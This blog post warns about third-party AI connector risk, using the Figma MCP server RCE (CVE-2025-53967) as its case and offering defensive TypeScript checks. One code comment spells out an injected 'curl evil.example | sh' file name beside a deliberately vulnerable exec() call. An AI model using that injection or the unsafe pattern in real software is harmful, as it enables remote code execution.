Are Your AI Tools Safe? Lessons from the Figma MCP Server Breach

It seems everyone is in a mad dash to plug some form of AI into every nook and cranny of their business. It’s the new digital gold rush. But in the frenzy to appear innovative, has anyone actually stopped to check if they’ve left the digital back door swinging wide open? We’re so mesmerised by what these new agentic AI systems can do—write code, design interfaces, manage workflows—that we’re conveniently ignoring the glaring security holes they bring with them. The rapid integration of these tools is creating a minefield of AI third-party risks, and it’s a problem we’re only just beginning to comprehend.
The latest canary in this particular coal mine is a nasty vulnerability found in a connector for Figma, the wildly popular design tool. It’s a perfect, if unsettling, illustration of how our excitement for AI functionality is dangerously outpacing our need for fundamental security. This isn’t just a technical blip; it’s a warning shot for every organisation racing to adopt AI without a second thought for the consequences.

The New Supply Chain: Understanding AI Third-Party Risks

So, what exactly are AI third-party risks? Think of it this way. When you integrate a third-party AI tool into your workflow, you’re not just getting a shiny new capability. You’re effectively hiring a team of contractors and giving them access to your digital premises. You inherit their tools, their work habits, and, crucially, any security flaws they might have. You wouldn’t let a construction crew start work on your headquarters without vetting them and checking their insurance, would you? And yet, countless businesses are giving AI agents the virtual keys to the kingdom with little more than a cursory glance at the marketing brochure.
This isn’t just about data privacy, though that’s certainly part of it. The real danger lies in the deep integration these systems require. Agentic AI, the kind that can take actions on its own, needs to connect to other applications and data sources to be useful. These connections, often managed by small, overlooked pieces of software called “connectors” or “servers”, become the weakest links in your security chain. A flaw in one of these components doesn’t just compromise the AI tool; it can compromise your entire network.

The Unholy Trinity of AI Security Headaches

When we peel back the layers of these AI integrations, three major areas of concern consistently float to the surface. These aren’t new problems, but the speed and scale of AI adoption have amplified them to a terrifying degree.

That Boring-but-Crucial Task: Patch Management

Let’s be honest, patch management is the digital equivalent of flossing. Nobody enjoys it, it’s easy to forget, but skipping it will eventually lead to catastrophic failure. In the context of AI, patches are the software updates that fix security holes and bugs in the tools and connectors you use. When a vulnerability is discovered, developers release a patch to fix it. It’s then up to you—the user—to apply that update.
The problem? In the rush to deploy, many organisations set up these AI integrations and then forget about them. That nifty AI code generator you installed six months ago? It’s likely running on outdated software with known vulnerabilities. As researchers from security firms like Wiz and Adversa have pointed out, the fast-paced development cycle of AI tools means patches are being released constantly. Failing to keep up isn’t just lazy; it’s an open invitation for attackers.
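What does “keeping up” actually look like in practice? For npm-based connectors, it can be as simple as a scheduled job that refuses to stay quiet about known advisories. The following is a minimal sketch, assuming Node 18+, npm 7+ and the usual `npm audit --json` output; the report’s exact JSON shape varies between npm versions, so treat the field names as indicative rather than gospel.

```typescript
// check-vulns.ts -- a minimal sketch: shout if any dependency of a deployed
// connector has a known high or critical advisory. Run it on a schedule or in CI.
import { execSync } from "node:child_process";

function auditCounts(): Record<string, number> {
  // npm exits non-zero when it finds vulnerabilities, so capture stdout
  // from the thrown error as well as from the happy path.
  let raw = "";
  try {
    raw = execSync("npm audit --json", { encoding: "utf8" });
  } catch (err: any) {
    raw = err.stdout ?? "";
  }
  if (!raw) return {};
  const report = JSON.parse(raw);
  return report?.metadata?.vulnerabilities ?? {};
}

const counts = auditCounts();
const serious = (counts.high ?? 0) + (counts.critical ?? 0);
console.log("Known vulnerabilities by severity:", counts);

if (serious > 0) {
  console.error(`Refusing to stay silent: ${serious} high/critical advisories found.`);
  process.exit(1);
}
```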

The Keys to the Kingdom: RCE Vulnerabilities

This brings us to the real nightmare scenario: RCE vulnerabilities. RCE, or Remote Code Execution, is as bad as it sounds. It means an attacker, potentially sitting on the other side of the world, can run their own malicious code on your system. Imagine giving a stranger a key to your office, except that key doesn’t just open the front door; it also unlocks the building’s master control panel, letting them shut down the power, walk into the server room, and listen in on every conversation. That’s what an RCE flaw does.
A recent example of this, as detailed by Dark Reading, is the CVE-2025-53967 vulnerability found in Framelink’s Figma MCP Server. This software component, designed to bridge the gap between Figma and AI code generators, contained a critical flaw. Because of improper input validation—a classic and frankly amateurish coding error—an attacker could send a specially crafted message and execute arbitrary commands on the server. With a severity score of 7.5 out of 10, this is no trivial matter. It’s a direct pathway into an organisation’s network, all because of a single, poorly secured third-party component.
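To see the class of bug involved, rather than the specific code (the sketch below is illustrative only, not the actual Framelink implementation, and the `figma-export` command-line tool is invented), improper input validation often means untrusted text is handed straight to a shell, where a character like `;` quietly turns data into commands.

```typescript
// An illustrative sketch of the vulnerability class only -- not the Framelink code.
// The `figma-export` CLI used here is hypothetical.
import { exec, execFile } from "node:child_process";

// Vulnerable pattern: input like "main.fig; curl evil.example | sh" rides
// straight into the shell as extra commands.
function exportFrameUnsafe(fileName: string) {
  exec(`figma-export ${fileName}`);
}

// Safer pattern: validate the input against an allow-list, then pass it as an
// argument (data) rather than interpolating it into a shell command (code).
function exportFrameSafer(fileName: string) {
  if (!/^[\w.-]+$/.test(fileName)) {
    throw new Error(`Rejected suspicious file name: ${fileName}`);
  }
  execFile("figma-export", [fileName]);
}
```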

The Weakest Link: Supply Chain Security

The Figma incident shines a glaring spotlight on the broader issue of supply chain security. Modern software isn’t built from scratch. It’s assembled, like a complex Lego model, from hundreds or even thousands of pre-built components, many of them open-source. The figma-developer-mcp npm package at the heart of the Framelink vulnerability is a perfect example. It’s just one small piece of a much larger puzzle.
Your supply chain security is about ensuring every single one of those pieces is secure. If a vulnerability exists in a tiny, obscure open-source library that your flashy AI tool depends on, your entire system is compromised. Attackers are increasingly targeting these downstream dependencies because they know it’s the path of least resistance. Why bother trying to breach a heavily fortified corporate network when you can just sneak a malicious bit of code into a popular developer package and wait for it to be installed all over the world?
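If you want to see how big your own Lego model really is, the lockfile already tells you. Here is a rough sketch, assuming an npm `package-lock.json` in lockfile version 2 or 3; the file name and output format are my own.

```typescript
// inventory.ts -- a rough sketch: enumerate every package this project pulls in,
// direct or transitive, straight from the npm lockfile (v2/v3 "packages" map).
import { readFileSync } from "node:fs";

const lock = JSON.parse(readFileSync("package-lock.json", "utf8"));

const entries = Object.entries(lock.packages ?? {})
  .filter(([path]) => path.startsWith("node_modules/"))
  .map(([path, meta]: [string, any]) => ({
    // Keep only the leaf package name, e.g. "node_modules/a/node_modules/b" -> "b".
    name: path.replace(/^.*node_modules\//, ""),
    version: meta.version as string | undefined,
  }));

console.log(`Your "one" dependency is really ${entries.length} packages:`);
for (const { name, version } of entries) {
  console.log(`  ${name}@${version ?? "unknown"}`);
}
```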

Case Study: The Figma MCP Server Fiasco

Let’s dig into the specifics of this Framelink Figma MCP Server vulnerability, because it’s a textbook case of what can go wrong.
The Model Context Protocol (MCP), introduced by Anthropic as an open standard, is designed to give AI agents a consistent way to interact with external tools. The server component acts as a middleman, translating the AI’s requests into actions within an application like Figma. According to the investigation cited by Dark Reading, the vulnerability (CVE-2025-53967) was found in an npm package used by the server, allowing an unauthenticated attacker to achieve remote code execution.
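To make the middleman role concrete: under the hood, MCP traffic is JSON-RPC 2.0. The shape below is a simplified illustration; the tool name and arguments are invented for this example, and the exact fields depend on the spec version and on which tools a given server exposes.

```typescript
// A simplified, illustrative MCP-style request. The protocol is JSON-RPC 2.0;
// the tool name and arguments below are hypothetical.
const callToolRequest = {
  jsonrpc: "2.0",
  id: 1,
  method: "tools/call",
  params: {
    name: "get_figma_data",           // hypothetical tool exposed by a server
    arguments: { fileKey: "abc123" }, // hypothetical parameters
  },
};

// Depending on the deployment, a client writes this to the server's stdin or
// POSTs it to an HTTP endpoint. An unauthenticated, internet-exposed endpoint
// will accept it from anyone.
console.log(JSON.stringify(callToolRequest, null, 2));
```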
Here’s where it gets truly concerning. Security researchers from Backslash Security and Knostic discovered that not only did this flaw exist, but the exposure was massive.
– They identified over 15,000 MCP servers deployed globally.
– Worse still, a scan revealed roughly 2,000 of these servers were exposed directly to the internet without any authentication.
Let that sink in. Thousands of organisations had installed a direct, unprotected bridge into their internal systems, all in the name of AI-powered convenience. The fix is technically simple: upgrade to version 0.6.3 or higher of the Figma MCP package. But how many of those 15,000 deployments have been patched? How many are still sitting out there, vulnerable and forgotten? This isn’t just a failure of one software package; it’s a systemic failure of security awareness.
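Answering “what is our exposure?” within hours rather than weeks can be as unglamorous as a lockfile check. A minimal sketch, assuming the `figma-developer-mcp` package and the 0.6.3 fix mentioned above, an npm lockfile v2/v3, and the widely used `semver` library (`npm install semver`):

```typescript
// exposure-check.ts -- a minimal sketch: is the vulnerable connector in our
// lockfile, and if so, is it older than the first fixed release?
import { readFileSync } from "node:fs";
import semver from "semver";

const FIXED = "0.6.3"; // first fixed release, per the advisory
const lock = JSON.parse(readFileSync("package-lock.json", "utf8"));

const hits = Object.entries(lock.packages ?? {}).filter(([path]) =>
  path.endsWith("node_modules/figma-developer-mcp")
);

if (hits.length === 0) {
  console.log("figma-developer-mcp not found in this lockfile.");
} else {
  for (const [path, meta] of hits as [string, any][]) {
    const ok = meta.version && semver.gte(meta.version, FIXED);
    console.log(`${path}: ${meta.version} -> ${ok ? "patched" : "VULNERABLE, upgrade now"}`);
  }
}
```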

It’s Time to Stop Admiring the Problem

So, what should you be doing about it? Sitting on your hands and hoping for the best is not a strategy. Mitigating AI third-party risks requires a proactive and, dare I say, slightly paranoid mindset.
Treat Patch Management Like a Fire Drill: Stop thinking of software updates as an annoying pop-up. Patch management needs to be a core, non-negotiable part of your security operations. Automate where you can, but have a clear, rapid-response process for critical vulnerabilities like the Figma MCP one. You should know within hours—not weeks—what your exposure is and have a plan to fix it.
Become the Nosy Neighbour of Your Tech Stack: You need to start auditing your third-party integrations with the same rigour you apply to your own code. Before you integrate any AI tool, ask the hard questions. What data does it access? What open-source components does it use? What is its security track record? Demand a Software Bill of Materials (SBOM) so you know exactly what “ingredients” you’re bringing into your environment.
Assume Breach and Build a Moat: The principle of “zero trust” has never been more relevant. Don’t automatically grant an AI agent—or any third-party tool—broad access to your network. Sandbox them. Isolate them. Give them the absolute minimum level of privilege they need to do their job and nothing more. If the Figma MCP server had been properly isolated, the impact of an RCE exploit could have been contained, rather than potentially exposing the entire network.
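In practice, for a connector, that starts with two unglamorous defaults: never bind it to every network interface, and make it fail closed without a credential. The sketch below is an illustrative hardening pattern, not the real Figma MCP server’s configuration; the `MCP_SHARED_SECRET` variable and `x-mcp-token` header are invented names.

```typescript
// An illustrative hardening sketch for any HTTP-based connector -- not the
// actual Figma MCP server configuration. Invented names: MCP_SHARED_SECRET,
// x-mcp-token.
import { createServer } from "node:http";

const TOKEN = process.env.MCP_SHARED_SECRET;
if (!TOKEN) {
  // Fail closed: no secret configured means the connector does not start.
  throw new Error("Refusing to start without MCP_SHARED_SECRET set.");
}

const server = createServer((req, res) => {
  if (req.headers["x-mcp-token"] !== TOKEN) {
    res.writeHead(401);
    res.end("unauthorised");
    return;
  }
  // ...hand the request off to the actual connector logic here...
  res.writeHead(200);
  res.end("ok");
});

// Loopback only: reachable from this machine, invisible to the wider internet.
server.listen(3333, "127.0.0.1", () => {
  console.log("Connector listening on 127.0.0.1:3333 only");
});
```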
The AI revolution is undoubtedly here, promising unprecedented leaps in productivity and creativity. But we are currently building this revolutionary future on a foundation of sand. The Framelink Figma vulnerability isn’t a freak accident; it’s the logical outcome of a culture that prizes speed and features above stability and security. It’s a loud, clanging alarm bell, and we need to start listening. Ignoring the deep-seated AI third-party risks is no longer an option. It’s a gamble you can’t afford to lose.
So, I have to ask: what’s the one AI tool your organisation has adopted that keeps you up at night? Are you confident it’s secure? Share your thoughts in the comments below.
